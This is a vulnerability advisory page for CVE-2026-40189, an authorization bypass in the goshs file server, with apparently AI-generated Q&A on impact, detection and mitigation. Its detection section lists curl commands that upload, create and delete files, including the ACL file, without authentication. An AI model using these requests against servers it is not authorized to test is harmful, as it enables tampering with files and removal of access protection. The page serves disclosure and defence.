CVE-2026-40189
Authorization Bypass in goshs Allows Unauthenticated File Manipulation
Publication date: 2026-04-10
Last updated on: 2026-04-14
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| goshs | goshs | 2.0.0 |
| goshs | goshs | to 2.0.0 (exc) |
| goshs | goshs | 2.0.0 |
| goshs | goshs | 2.0.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-40189 is a critical authorization bypass vulnerability in goshs, a SimpleHTTPServer written in Go. The server uses per-folder .goshs ACL/basic-auth files to protect directory listings and file reads. However, before version 2.0.0-beta.4, goshs did not enforce these authorization checks on state-changing HTTP routes such as file uploads, directory creation, and file deletion.
This means an unauthenticated attacker could upload files using PUT or multipart POST /upload, create directories with the ?mkdir parameter, and delete files with the ?delete parameter inside directories protected by .goshs ACL files. Critically, the attacker could delete the .goshs ACL file itself, removing the folder's authentication policy and allowing unrestricted access to previously protected content.
This vulnerability results in a complete bypass of confidentiality, integrity, and availability protections for the affected directories.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability results in a critical authorization bypass that affects confidentiality, integrity, and availability of data stored in goshs-protected directories.
Because unauthorized attackers can upload, delete, or modify files and remove access control policies, sensitive data could be exposed or altered without proper authorization.
Such a failure to enforce authorization on state-changing operations can lead to violations of data protection requirements found in common standards and regulations like GDPR and HIPAA, which mandate strict controls over access to and modification of sensitive data.
Therefore, this vulnerability undermines compliance by allowing unauthorized access and modification of protected data, potentially resulting in data breaches and loss of data integrity.
How can this vulnerability impact me? :
This vulnerability allows remote unauthenticated attackers to perform unauthorized state-changing operations within directories protected by .goshs ACL files.
- Attackers can upload files using PUT or multipart POST /upload requests.
- Attackers can create new directories using the ?mkdir query parameter.
- Attackers can delete files, including the critical .goshs ACL file itself, using the ?delete query parameter.
By deleting the .goshs ACL file, attackers remove the folder's authentication policy, enabling them to access previously protected content without any credentials.
Overall, this leads to a complete compromise of confidentiality, integrity, and availability of the protected data and resources.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing whether unauthenticated state-changing HTTP requests are allowed in directories protected by .goshs ACL files. Specifically, you can attempt to perform unauthorized file uploads, directory creation, and file deletions without authentication.
- Try an unauthenticated PUT request to upload a file to a protected directory.
- Try an unauthenticated multipart POST request to the /upload endpoint.
- Attempt to create a directory using the ?mkdir query parameter without authentication.
- Attempt to delete a file, including the .goshs ACL file itself, using the ?delete query parameter without authentication.
For example, using curl commands:
- curl -X PUT http://target/protected/path/filename -d 'test content'
- curl -F 'file=@localfile' http://target/protected/path/upload
- curl http://target/protected/path/?mkdir=newdir
- curl http://target/protected/path/?delete=filename
If these requests succeed without authentication, the vulnerability is present.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include:
- Upgrade goshs to version 2.0.0-beta.4 or later, where the vulnerability is fixed.
- Ensure that authorization checks are enforced on all state-changing HTTP routes, including PUT, multipart POST /upload, ?mkdir, and ?delete.
- Protect the .goshs ACL files from deletion, overwriting, or replacement by blocking such operations.
- Apply patches that implement recursive ACL enforcement and prevent unauthorized modification of .goshs files.
These steps will prevent unauthenticated attackers from bypassing authorization and protect confidentiality, integrity, and availability of the protected directories.